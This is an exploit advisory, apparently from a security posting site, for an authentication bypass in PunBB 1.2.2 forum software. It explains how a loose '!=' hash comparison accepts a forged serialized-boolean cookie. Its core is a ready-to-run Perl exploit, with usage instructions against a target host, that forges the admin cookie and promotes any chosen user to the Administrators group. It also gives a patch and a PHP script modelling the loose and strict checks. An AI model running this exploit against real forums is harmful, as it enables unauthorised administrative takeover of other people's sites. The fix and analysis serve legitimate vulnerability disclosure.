PunBB Admin Access Bypass Exploit
Category: Vulnerability Posted: 2005-04-08 by basher13 Views: 1157
Update:
11:35 PM 3/28/2005
Subject:
" PunBB Admin Access Bypass Exploit "
Vulnerable version:
punBB 1.2.2
Description:
In short, PunBB is a fast and lightweight PHP-powered discussion board.
It is released under the GNU Public License. Its primary goal is to
be a faster, smaller and less graphic alternative to otherwise excellent
discussion boards such as phpBB, Invision Power Board and vBulletin.
PunBB has fewer features than many other discussion boards, but is generally
faster and outputs smaller pages.
Vulnerability:
The vulnerability is in check_cookie() in include/functions.php, the function that
authenticates a visitor from the punbb_cookie cookie. Its password-hash comparison
lets a visitor take on any user ID, including the administrator's, without knowing
the password.
Relevant part of the vulnerable file include/functions.php:
(..)
function check_cookie(&$pun_user)
{
    ...
    if (isset($_COOKIE[$cookie_name]))
        list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);

    if ($cookie['user_id'] > 1)
    {
        // Check if there's a user with the user ID and password hash from the cookie
        $result = $db->query('SELECT ...');   // query elided
        $pun_user = $db->fetch_assoc($result);

        // If user authorisation failed
        if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
(..)
The comparison uses the loose operator !=. When PHP compares a string with a boolean
it converts the string to a boolean, and any non-empty string becomes true, so
md5($cookie_seed.$pun_user['password']) != true evaluates to false and the
"authorisation failed" branch is never taken. A cookie whose password_hash element
is a serialized boolean true therefore logs the visitor in as any user ID without
the password. The forged cookie (before URL-encoding) is:
a:2:{i:0;s:1:"2";i:1;b:1;}
where 2 is the target user ID. In a default PunBB 1.2 install the guest account is
ID 1 and the first administrator created by the installer is ID 2, which is why the
code only authenticates IDs greater than 1 and why the exploit below defaults to
admin ID 2.
Exploit:
#!/usr/bin/perl
# PunBB Admin Access Bypass Exploit
# ------------------------------------
#
# Greats: 1dt.w0lf (has discovered bug)
# info: 98.to/infamous
#
# Sends a forged punbb_cookie (user_id = admin ID, password_hash = boolean true)
# with a POST to profile.php that puts the target user ID into group 1
# (Administrators). The loose != in check_cookie() accepts the boolean.
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 4)
{
    print "\nPunBB Admin Access Bypass Exploit\n\n";
    print "---------------------------------\n";
    print "INFGP - Hacking&Security Research\n";
    print "\n\n";
    print "[-]Usage: pnbbexp.pl [host] [path] [admin ID] [user ID] \n";
    print "[!]Exam: pnbbexp.pl www.target.com forum 2 13 \n";
    exit(1);
}

my ($server, $folder, $adm, $usr) = @ARGV;

print "\n[+]Connecting to host: $server\n\n";
my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $server,
    PeerPort => "80") or die "[-]$server connection [FAILED]\n";
print "[+]Creating socket [OK]\n";

# Text profile.php prints after a successful group change
my $string = 'Group membership saved';
# serialize(array("$adm", true)): the boolean is what defeats the != check
my $cook = 'a:2:{i:0;s:'.length($adm).':"'.$adm.'";i:1;b:1;}';
# group_id=1 is the Administrators group
my $form = 'form_sent=1&group_id=1&update_group_membership=Save';
# Percent-encode every byte of the cookie value
$cook =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

print "[+]Sent 0day..\n\n";
# Connection: close so the read loop below ends when the server is done
print $socket "POST /$folder/profile.php?section=admin&id=$usr&action=foo HTTP/1.0\r\n";
print $socket "Connection: close\r\n";
print $socket "Pragma: no-cache\r\n";
print $socket "Cache-control: no-cache\r\n";
print $socket "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n";
print $socket "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\r\n";
print $socket "Accept-Language: en\r\n";
print $socket "Host: $server\r\n";
print $socket "Referer: http://$server/$folder/profile.php?section=admin&id=$usr&action=foo\r\n";
print $socket "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0\r\n";
print $socket "Cookie: punbb_cookie=$cook\r\n";
print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
print $socket "Content-Length: ".length($form)."\r\n\r\n";
print $socket $form;

while (<$socket>)
{
    if (/$string/)
    {
        print "[+]Group membership saved..[OK]\n";
        print "[>]Now user with ID $usr has admin status\n";
        last;
    }
}
close($socket);
Solution:
In include/functions.php change the loose comparison
if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
to the strict one
if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) !== $cookie['password_hash'])
i.e. add a second '='. With !== PHP compares type as well as value, so a boolean
(or an integer, or anything else that is not the exact md5 string) taken from the
cookie can no longer compare equal to the hash. A more defensive fix also rejects a
password_hash that is not a string (is_string()) and, on PHP 5.6 or later, compares
with hash_equals(); unserialize() on a cookie value chosen by the client is itself
worth replacing with a format that cannot carry arbitrary types.
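The following self-contained PHP script is added here as an illustration; it is not PunBB's own code. It models the password_hash comparison of check_cookie() against a constructed user row, runs the attacker's cookie through the loose check as shipped in 1.2.2 and through the strict check from the fix (with the extra is_string() guard mentioned above), and then confirms that a genuine cookie still passes the strict check. The seed, user row and password are assumed test values.

```php
<?php
// Added example, not PunBB code. Models the password_hash comparison from
// check_cookie() in PunBB 1.2.2 include/functions.php with constructed data.

$cookie_seed = 'assumed-install-seed';                   // assumed value
$user_row = ['id' => 2, 'password' => sha1('hunter2')];  // constructed admin row

// Attacker's punbb_cookie value before percent-encoding:
// a:2:{i:0;s:1:"2";i:1;b:1;}  -> user_id "2", password_hash = boolean true
$evil_cookie = serialize(['2', true]);

// What the real browser of user 2 would send
$real_cookie = serialize(['2', md5($cookie_seed . $user_row['password'])]);

// Loose comparison as shipped in 1.2.2. Returns true when the cookie is accepted.
function vulnerable_check($raw_cookie, $user_row, $cookie_seed)
{
    list($user_id, $password_hash) = @unserialize($raw_cookie);
    if ($user_id > 1) {
        // "md5string" != true: the string is converted to bool (true), so
        // true != true is false, the branch is skipped and the cookie passes
        if (!isset($user_row['id']) || md5($cookie_seed . $user_row['password']) != $password_hash) {
            return false;
        }
        return true;
    }
    return false;
}

// Strict comparison as in the fix, plus a type check on the cookie field.
function fixed_check($raw_cookie, $user_row, $cookie_seed)
{
    list($user_id, $password_hash) = @unserialize($raw_cookie);
    if ($user_id > 1) {
        if (!isset($user_row['id']) || !is_string($password_hash)
            || md5($cookie_seed . $user_row['password']) !== $password_hash) {
            return false;
        }
        return true;
    }
    return false;
}

printf("evil cookie, loose check : %s\n",
    vulnerable_check($evil_cookie, $user_row, $cookie_seed) ? 'ACCEPTED (bypass)' : 'rejected');
printf("evil cookie, strict check: %s\n",
    fixed_check($evil_cookie, $user_row, $cookie_seed) ? 'ACCEPTED' : 'rejected');
printf("real cookie, strict check: %s\n",
    fixed_check($real_cookie, $user_row, $cookie_seed) ? 'accepted' : 'REJECTED');
```

Run it with the PHP CLI (php bypass.php, any name you like). The evil cookie is accepted by the loose check and rejected by the strict one, while the real cookie is still accepted, which is the behaviour the one-character patch above has to achieve.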
Vendor URL:
http://www.punbb.org